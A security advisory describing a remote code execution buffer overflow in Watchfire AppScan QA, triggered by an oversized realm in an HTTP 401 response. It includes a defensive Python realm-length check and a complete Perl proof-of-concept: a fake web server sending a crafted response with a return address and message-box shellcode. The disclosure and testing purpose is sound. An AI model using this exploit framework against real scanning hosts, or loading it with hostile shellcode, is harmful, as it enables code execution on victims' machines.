[NT] Watchfire AppScan QA Remote Code Execution



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Watchfire AppScan QA Remote Code Execution
------------------------------------------------------------------------


SUMMARY

AppScan QA is "an automated web application testing tool that provides QA
personnel with security defect analysis and remediation information.
Instead of manually searching for security defects, application testers
trust AppScan QA to detect security defects and vulnerabilities
automatically as an integrated component of enterprise development and
testing processes. AppScan QA automates test script creation,
modification, and maintenance to ensure reliable and repeatable testing".
A vulnerability in Watchfire's AppScan QA allows a remote attacker to make
the product execute arbitrary code by overflowing the internal buffer in
which it stores the realm value of an HTTP response's WWW-Authenticate
header.

DETAILS

Vulnerable Systems:
* AppScan QA version 5.0.609 / Subscription 7
* AppScan QA version 5.0.134

Immune Systems:
* AppScan QA version 5.0.609 / Subscription 8

The vulnerability exists in the way AppScan QA processes HTTP 401
responses. If a scanned server returns a crafted 401 response whose
WWW-Authenticate header carries a realm value of more than 351 characters,
a buffer overflow occurs, leading to remote code execution with the
privileges of the user running AppScan QA. The attacker therefore needs
the victim to scan a server under the attacker's control.
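A defender-side check for the trigger described above, added here as an example and not part of the advisory or the vendor's code: it parses a raw HTTP response, extracts every realm from its WWW-Authenticate headers (quoted-string or bare-token form, with backslash escapes undone) and reports any realm longer than the 351-character limit the advisory gives. The function names and the sample responses are constructed for this example.

```python
import re

# Realm lengths above this triggered the overflow in the advisory's affected
# AppScan QA builds (a realm of more than 351 characters).
REALM_LIMIT = 351

# auth-param value: a quoted-string (with backslash escapes) or a bare token
_REALM_RE = re.compile(r'realm\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,;]+))',
                       re.IGNORECASE)


def parse_http_response(raw: bytes):
    """Split a raw HTTP response into (status_code, {lowercased name: [values]})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def oversized_realms(raw: bytes, limit: int = REALM_LIMIT):
    """Return every realm in a 401 response whose unescaped length exceeds limit."""
    status, headers = parse_http_response(raw)
    if status != 401:
        return []
    found = []
    for value in headers.get("www-authenticate", []):
        for m in _REALM_RE.finditer(value):
            realm = m.group(1) if m.group(1) is not None else m.group(2)
            realm = re.sub(r"\\(.)", r"\1", realm)  # undo quoted-pair escapes
            if len(realm) > limit:
                found.append(realm)
    return found


# Constructed sample responses for the demonstration (not captured traffic).
BENIGN_401 = (b"HTTP/1.1 401 Authorization Required\r\nServer: Apache\r\n"
              b'WWW-Authenticate: Basic realm="Admin Area"\r\n'
              b"Content-Length: 0\r\n\r\n")
SUSPICIOUS_401 = (b"HTTP/1.1 401 Authorization Required\r\nServer: Apache\r\n"
                  b'WWW-Authenticate: Basic realm="' + b"A" * 400 + b'"\r\n'
                  b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_401), ("suspicious", SUSPICIOUS_401)):
        print(name, "ALERT" if oversized_realms(sample) else "ok")
```

The same check can be applied to responses observed by a proxy in front of a scanning host, so that a scanner is never handed an oversized realm in the first place.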

Vendor Response:
* 10/12/2005: Initial Vendor Contact.
* 10/18/2005: Vendor Confirmed Vulnerability.
* 11/02/2005: Vendor Releases Update.
* 12/15/2005: Advisory Public Disclosure.

Exploit:
#!/usr/bin/perl -w
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to set up the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get a "You are vulnerable!" popup, you should upgrade immediately.
#
# PoC developed for Windows 2000 Server SP4.
#

use strict;
use IO::Socket::INET;

# Disable output buffering
$| = 1;

# Define the 200 OK response: a page linking to the protected /admin resource
my $res200 = "HTTP/1.1 200 OK\r\n" .
             "Host: www.test.com\r\n" .
             "Date: Thu, 01 Nov 2005 14:38:20 GMT\r\n" .
             "Server: Apache\r\n" .
             "Content-Length: 26\r\n" .
             "Keep-Alive: timeout=15, max=100\r\n" .
             "Connection: Close\r\n" .
             "Content-Type: text/html; charset=ISO-8859-1\r\n\r\n" .
             "<a href='/admin'>admin</a>";

# Define the 401 Authorization Required header and tail; the realm value
# is inserted between them
my $res401Head = "HTTP/1.1 401 Authorization Required\r\n" .
                 "Host: www.test.com\r\n" .
                 "Date: Thu, 01 Nov 2005 14:43:53 GMT\r\n" .
                 "Server: Apache\r\n" .
                 "WWW-Authenticate: Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\n" .
                 "Keep-Alive: timeout=15, max=100\r\n" .
                 "Connection: Close\r\n" .
                 "Content-Type: text/html; charset=iso-8859-1\r\n\r\n" .
                 "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n" .
                 "<html><head>\r\n<title>401 Authorization Required</title>\r\n" .
                 "</head><body>\r\n<h1>Authorization Required</h1>\r\n" .
                 "<p>This server could not verify that you\r\n" .
                 "are authorized to access the document\r\n" .
                 "requested. Either you supplied the wrong\r\n" .
                 "credentials (e.g., bad password), or your\r\n" .
                 "browser doesn't understand how to supply\r\n" .
                 "the credentials required.</p>\r\n" .
                 "</body></html>";

# Return address: "call ebx" in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

# Shellcode: displays the "You are vulnerable!" message box
my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb" .
"\x21\x02\x59\x7c\x51\xff\xd3\xeb" .
"\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c" .
"\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13" .
"\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69" .
"\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72" .
"\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61" .
"\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59" .
"\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72" .
"\x61\x62\x6c\x65\x21\x4e";

# Realm value: 347 bytes of padding, a short jump over the two filler bytes
# and the saved return address, the return address itself, then the
# shellcode; the closing quote ends the header
my $resExploit = $res401Head . "\x41" x 347 . "\xeb\x06AA" . $ret . $scode .
                 "\"\r\n" . $res401Tail;

# Initialization of the fake web server
my $srv = IO::Socket::INET->new(LocalPort => 80,
                                Reuse     => 1,
                                Listen    => 1) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";

while (my $cli = $srv->accept()) {
    printf "Request from %s\n", $cli->peerhost;
    while (<$cli>) {
        if (/admin/) {
            # If the request is for "admin", send the crafted 401 response
            print "Request for protected resource detected...launching exploit\n";
            print $cli $resExploit;
        }
        else {
            # Otherwise send a normal response
            print $cli $res200;
        }
        # One response per connection: the request line decides which one
        last;
    }
    close($cli);
}
close($srv);


ADDITIONAL INFORMATION

The information has been provided by <mailto:mnunez@xxxxxxxxxx> Mariano
Nunez Di Croce.
The original article can be found at:
<http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf> CYBSEC Security Advisory AppScanQA RemoteCodeExec (pdf)
